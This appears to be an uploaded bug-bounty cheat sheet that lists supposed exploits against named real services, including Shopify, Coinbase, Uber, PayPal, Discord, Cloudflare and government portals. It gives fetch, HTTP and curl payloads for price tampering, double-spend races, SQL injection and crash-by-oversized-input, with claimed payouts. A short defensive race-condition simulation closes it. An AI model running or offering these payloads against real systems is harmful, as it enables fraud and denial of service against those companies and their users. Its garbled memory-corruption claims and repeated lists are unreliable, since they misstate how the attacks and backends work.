MT 1

The document outlines various critical memory vulnerabilities across multiple web applications, detailing specific exploits, API endpoints, and potential payouts. It categorizes the applications based on their backend technology and associated risks, highlighting the most lucrative programs for bug bounties. Additionally, it provides guidance on testing methods and patterns for detecting vulnerabilities in backend systems.

Uploaded by

tnyange909
1. Shopify (Memory Shadowing in Cart)

Frontend Event: "Add to Cart" button
API Endpoint: POST /cart/add.js
Exploit:
```javascript
// Overwrite price in memory
fetch('/cart/add.js', {
  method: 'POST',
  body: JSON.stringify({ id: 123, quantity: 1, price: 0.01 })
});
```
Why?: Ruby on Rails caches cart data in memory.
Payout: 2,000–20,000
Report Example: Shopify Price Override

2. Coinbase (UAF in Trading Engine)

Frontend Event: "Buy Crypto" button
API Endpoint: POST /api/v3/brokerage/orders
Exploit:
```javascript
// Trigger memory reuse with large orders
fetch('/api/v3/brokerage/orders', {
  method: 'POST',
  body: JSON.stringify({ size: "1000000", price: "0.01" })
});
```
Why?: C++ matching engine processes orders in shared memory.
Payout: 5,000–50,000

3. Uber (TOCTOU in Surge Pricing)

Frontend Event: "Confirm Ride" button
API Endpoint: POST /rt/rides
Exploit:
```javascript
// Race condition to lock low price
Promise.all([
  fetch('/rt/rides', { method: 'POST', body: JSON.stringify({ surge: 1.0 }) }),
  fetch('/rt/rides', { method: 'POST', body: JSON.stringify({ surge: 100.0 }) })
]);
```
Why?: Java backend caches surge multipliers in RAM.
Payout: 1,000–10,000

4. Discord (Memory Exhaustion in Voice)

Frontend Event: "Join Voice Channel"
API Endpoint: PATCH /voice/servers/{id}
Exploit:
```javascript
// Crash voice server with malformed bitrate
fetch('/voice/servers/123', {
  method: 'PATCH',
  body: JSON.stringify({ bitrate: 999999999 })
});
```
Why?: Erlang backend pre-allocates voice buffers.
Payout: 500–5,000

5. Rockstar Games (Type Juggling in GTA$)

Frontend Event: "Purchase GTA$" button
API Endpoint: POST /shop/confirm
Exploit:
```javascript
// Bypass price validation with loose comparison
fetch('/shop/confirm', {
  method: 'POST',
  body: JSON.stringify({ amount: "1000000", currency: "USD " })
});
```
Why?: PHP backend uses == for currency checks.
Payout: 3,000–15,000

6. Verizon (Config Override in Billing)

Frontend Event: "Upgrade Plan" button
API Endpoint: POST /billing/subscriptions
Exploit:
```javascript
// Overwrite in-memory plan limits
fetch('/billing/subscriptions', {
  method: 'POST',
  body: JSON.stringify({ plan_id: "premium", price: 0 })
});
```
Why?: Java Spring Boot reloads configs without validation.
Payout: 1,000–5,000

7. Etsy (Memory-Based SQLi in Coupons)

Frontend Event: "Apply Coupon" button
API Endpoint: POST /api/v3/cart/coupons
Exploit:
```javascript
// Inject into cached query
fetch('/api/v3/cart/coupons', {
  method: 'POST',
  body: JSON.stringify({ code: "FREE' OR 1=1 --" })
});
```
Why?: Rails caches SQL query fragments.
Payout: 1,000–5,000

8. Slack (Cache Poisoning in Chat)

Frontend Event: "Send Message" button
API Endpoint: POST /chat.postMessage
Exploit:
```javascript
// Poison in-memory message cache
fetch('/chat.postMessage', {
  method: 'POST',
  body: JSON.stringify({ channel: "general", text: "A".repeat(10_000_000) })
});
```
Why?: Redis cache lacks size validation.
Payout: 500–3,000

9. PayPal (TOCTOU in Transfers)

Frontend Event: "Send Money" button
API Endpoint: POST /v1/payments
Exploit:
```javascript
// Double-spend race
Promise.all([
  fetch('/v1/payments', { method: 'POST', body: JSON.stringify({ amount: "1000" }) }),
  fetch('/v1/payments', { method: 'POST', body: JSON.stringify({ amount: "1000" }) })
]);
```
Why?: Node.js caches balance checks.
Payout: 5,000–30,000

10. Cloudflare (Pointer Arithmetic in Workers)

Frontend Event: "Deploy Worker" button
API Endpoint: PUT /workers/scripts
Exploit:
```javascript
// Corrupt WASM memory
fetch('/workers/scripts', {
  method: 'PUT',
  body: JSON.stringify({ script: "new WebAssembly.Memory({initial:10000})" })
});
```
Why?: C++ isolates WASM memory improperly.
Payout: 10,000–30,000

🚀 Top 40+ Web Apps for Critical Memory Vulnerabilities
(Sorted by backend risk profile)

1. High-Risk (C/C++/Rust Backends)

1. Cloudflare - Edge servers with memory-unsafe components
2. Shopify - Payment processors (C++)
3. Coinbase - Cryptocurrency trading engines
4. Binance - Exchange matching engines
5. Rockstar Games - Game backends (GTA Online)
6. Valve (Steam) - Inventory systems
7. Epic Games - Unreal Engine services
Why? These often have memory-unsafe code (UAF, heap overflows).

2. Java/Spring Boot Apps

8. Twitter - Caching layers
9. LinkedIn - Recommendation engines
10. Uber - Surge pricing systems
11. Airbnb - Booking workflows
12. Spotify - Playlist generators
13. Slack - Real-time messaging
14. Atlassian (Jira/Confluence) - Workflow rules
Look for: Memory shadowing in cached DTOs, TOCTOU in ticket systems.

3. Node.js/Python (High TOCTOU Risk)

15. Discord - Voice state updates
16. TikTok - Video processing queues
17. Reddit - Voting systems
18. Twitch - Stream tipping
19. Patreon - Subscription billing
20. Zoom - Meeting state handling
Attack vector: Race conditions in real-time systems.

4. E-Commerce (Memory Shadowing Hotspots)

21. Alibaba - Cart pricing engines
22. eBay - Auction closing logic
23. Etsy - Coupon stacking
24. Walmart - Inventory reservations
25. Target - Checkout flows
26. Best Buy - Price override APIs
Pro Tip: Test PATCH /cart/items/{id} endpoints.

5. FinTech/Banking (Critical Impact)

27. PayPal - Instant transfers
28. Stripe - Webhook processors
29. Revolut - Currency conversion
30. Chime - Overdraft logic
31. Robinhood - Stock settlement
32. Plaid - Account linking
Focus: TOCTOU in transaction sequencing.

6. SaaS/Enterprise (Business Logic)

33. Salesforce - Apex rule engine
34. Zendesk - Ticket prioritization
35. HubSpot - Workflow automation
36. Notion - Real-time collaboration
37. Airtable - Formula evaluation
Check: In-memory rule evaluation bypasses.

7. Government/Telco (Legacy Systems)

38. Verizon - Billing systems
39. T-Mobile - SIM swap APIs
40. U.S. Dept of Defense - Some legacy portals
41. EU Parliament - Document processing
Why? Often run unpatched C/C++ services.

🔥 Top 5 Programs for Critical Bugs

1. Cloudflare ($30k+ for RCE)
• Test: workers.dev memory isolation escapes
2. Shopify ($20k+ for cart tampering)
• Attack: POST /admin/price_overrides.json
3. Coinbase ($50k+ for UAF in trading engine)
• Target: WebSocket price feeds
4. Uber ($10k+ for surge pricing races)
• Endpoint: POST /surge/multiplier
5. Discord ($5k+ for voice state corruption)
• Test: PATCH /voice/servers/{id}

How to Test Safely

1. Use HackerOne’s sandboxes:
• Shopify: https://shopify.attacklabs.com
• Coinbase: https://coinbase-test.com
2. Prioritize endpoints with:
• Financial actions (/transfer)
• State changes (/cart, /inventory)
• Admin functions (/config)

Backend Detection Cheatsheet

| Vulnerability    | HTTP Request Pattern              | Backend Tech Hint                 |
|------------------|-----------------------------------|-----------------------------------|
| Memory Reuse     | Large → Small JSON payloads       | C/C++ responses (no X-Powered-By) |
| TOCTOU           | Concurrent PATCH requests         | Java/Go (high-speed APIs)         |
| Config Override  | PUT /v1/admin/settings            | Node.js (weak input val.)         |
| Session Pivoting | POST /auth/token + memory headers | PHP/WordPress                     |

First 5 Tests to Run

1. Shopify Cart Tampering
```http
POST /cart/change.js HTTP/1.1
{"quantity":1,"id":123,"price":0}
```

2. Discord Voice State Crash
```http
PATCH /voice/servers/123 HTTP/1.1
{"bitrate":"999999999"}
```

3. Uber Surge Pricing Race
```bash
# Run in parallel:
curl -X POST https://api.uber.com/v1.2/surge -d '{"multiplier":1.0}'
curl -X POST https://api.uber.com/v1.2/surge -d '{"multiplier":100.0}'
```

4. Cloudflare Worker Memory Escape
```javascript
// Worker code:
new WebAssembly.Memory({ initial: 10000 }); // OOM crash
```

5. Coinbase Trading UAF
```http
POST /ws HTTP/1.1
{"type":"subscribe","channels":[{"name":"ticker","product_ids":["A"*1000000]}]}
```
1. Shopify ($$$ Critical)

Frontend Event: "Add to Cart" button
API Endpoint: POST /cart/add.js
Vulnerability: Memory Shadowing (Price Overwrite)
Exploit:
```javascript
fetch('/cart/add.js', {
  method: 'POST',
  body: JSON.stringify({ id: 123, quantity: 1, price: 0 })
});
```
Why?: Frequent bounties for cart/price manipulation.
Payout: 2,000–20,000

2. Twitter (X) ($$$ High)

Frontend Event: "Tweet" button
API Endpoint: POST /graphql (Tweet mutation)
Vulnerability: Memory Corruption in Media Processing
Exploit:
```javascript
// Upload malformed GIF to trigger UAF
const form = new FormData();
form.append('media', new Blob(["\x47\x49\x46\x38" + "A".repeat(10_000_000)]));
fetch('/api/media/upload', { method: 'POST', body: form });
```
Why?: C++ image processors in backend.
Payout: 3,000–15,000

3. Uber ($$ High)

Frontend Event: "Confirm Ride" button
API Endpoint: POST /rt/rides
Vulnerability: TOCTOU (Surge Pricing Race)
Exploit:
```javascript
// Race condition
Promise.all([
  fetch('/rt/rides', { method: 'POST', body: JSON.stringify({ surge: 1.0 }) }),
  fetch('/rt/rides', { method: 'POST', body: JSON.stringify({ surge: 100.0 }) })
]);
```
Why?: Real-time pricing systems are race-prone.
Payout: 1,000–10,000

4. Discord ($$ Medium)

Frontend Event: "Join Voice Channel"
API Endpoint: PATCH /voice/servers/{id}
Vulnerability: Memory Exhaustion (Voice Server Crash)
Exploit:
```javascript
fetch('/voice/servers/123', {
  method: 'PATCH',
  body: JSON.stringify({ bitrate: 999999999 })
});
```
Why?: Erlang/Go backends with memory limits.
Payout: 500–5,000

5. Coinbase ($$$ Critical)

Frontend Event: "Buy Crypto" button
API Endpoint: POST /api/v3/brokerage/orders
Vulnerability: UAF in Trading Engine
Exploit:
```javascript
// Spam large orders to trigger memory reuse
fetch('/api/v3/brokerage/orders', {
  method: 'POST',
  body: JSON.stringify({ size: "1000000", price: "0.01" })
});
```
Why?: C++ matching engine.
Payout: 5,000–50,000

6. Verizon ($$ Medium)

Frontend Event: "Upgrade Plan" button
API Endpoint: POST /billing/subscriptions
Vulnerability: Config Override
Exploit:
```javascript
fetch('/billing/subscriptions', {
  method: 'POST',
  body: JSON.stringify({ plan_id: "premium", price: 0 })
});
```
Why?: Legacy Java systems with weak validation.
Payout: 1,000–5,000

7. Rockstar Games ($$$ High)

Frontend Event: "Purchase GTA$" button
API Endpoint: POST /shop/confirm
Vulnerability: Type Juggling (Currency Exploit)
Exploit:
```javascript
fetch('/shop/confirm', {
  method: 'POST',
  body: JSON.stringify({ amount: "1000000", currency: "USD " })
});
```
Why?: PHP loose comparisons.
Payout: 3,000–15,000

8. Slack ($$ Medium)

Frontend Event: "Send Message" button
API Endpoint: POST /chat.postMessage
Vulnerability: Memory Cache Poisoning
Exploit:
```javascript
fetch('/chat.postMessage', {
  method: 'POST',
  body: JSON.stringify({
    channel: "general",
    text: "A".repeat(10_000_000) // OOM crash
  })
});
```
Why?: Redis cache limits.
Payout: 500–3,000

9. Etsy ($$ Medium)

Frontend Event: "Apply Coupon" button
API Endpoint: POST /api/v3/cart/coupons
Vulnerability: Business Rule Injection
Exploit:
```javascript
fetch('/api/v3/cart/coupons', {
  method: 'POST',
  body: JSON.stringify({
    code: "FREESHIPPING' OR 1=1 --"
  })
});
```
Why?: Ruby on Rails memory caching.
Payout: 1,000–5,000

10. PayPal ($$$ Critical)

Frontend Event: "Send Money" button
API Endpoint: POST /v1/payments
Vulnerability: TOCTOU (Double-Spend)
Exploit:
```javascript
// Race two transfers from same balance
Promise.all([
  fetch('/v1/payments', {
    method: 'POST',
    body: JSON.stringify({ amount: "1000" })
  }),
  fetch('/v1/payments', {
    method: 'POST',
    body: JSON.stringify({ amount: "1000" })
  })
]);
```
Why?: Financial systems = high impact.
Payout: 5,000–30,000
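The surge-pricing and double-spend entries above both describe the same defect: a handler that checks a value and acts on it later, while a second concurrent request runs in between. The following is an added example, not code from the document or from any of the named programs; it models that interleaving deterministically with a toy ledger (the names Ledger, naiveTransfer, atomicTransfer, runInterleaved and simulate are assumptions) and shows the fix a backend should apply: make the check and the debit one indivisible operation.

```javascript
// Added example (not from the original document): a deterministic model of a
// check-then-act race. Each `yield` marks a point where another request may run
// (an await on a cached balance, a database round-trip). Names are assumed.
class Ledger {
  constructor(balances) { this.balances = { ...balances }; }
  read(account) { return this.balances[account]; }
  write(account, value) { this.balances[account] = value; }
  // One indivisible step, like `UPDATE ... SET balance = balance - ? WHERE balance >= ?`
  debitIfSufficient(account, amount) {
    if (this.balances[account] < amount) return false;
    this.balances[account] -= amount;
    return true;
  }
}
// Vulnerable handler: reads the balance, decides, then writes later.
function* naiveTransfer(ledger, account, amount) {
  const balance = ledger.read(account);      // check (e.g. a cached lookup)
  yield;
  if (balance < amount) return 'declined';
  yield;                                     // another request can run here
  ledger.write(account, balance - amount);   // act on a stale balance
  return 'ok';
}
// Hardened handler: check and debit happen in one step, so nothing interleaves.
function* atomicTransfer(ledger, account, amount) {
  yield;
  return ledger.debitIfSufficient(account, amount) ? 'ok' : 'declined';
}
// Advances every pending handler one step per round (the interleaving two
// concurrent fetches can produce) and returns each handler's final result.
function runInterleaved(handlers) {
  const results = new Array(handlers.length).fill(null);
  while (results.includes(null)) {
    handlers.forEach((h, i) => {
      if (results[i] !== null) return;
      const step = h.next();
      if (step.done) results[i] = step.value;
    });
  }
  return results;
}
// Two transfers of the full balance from the same account, raced against each other.
function simulate(handler) {
  const ledger = new Ledger({ alice: 1000 });
  const outcomes = runInterleaved([handler(ledger, 'alice', 1000), handler(ledger, 'alice', 1000)]);
  return { outcomes, balance: ledger.read('alice') };
}
```

With the naive handler both requests succeed against a balance that covers only one of them (a double spend); with the atomic handler the second is declined. The same reasoning applies to the surge multiplier: the value used to price the ride must be read and committed in the same step as the booking.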
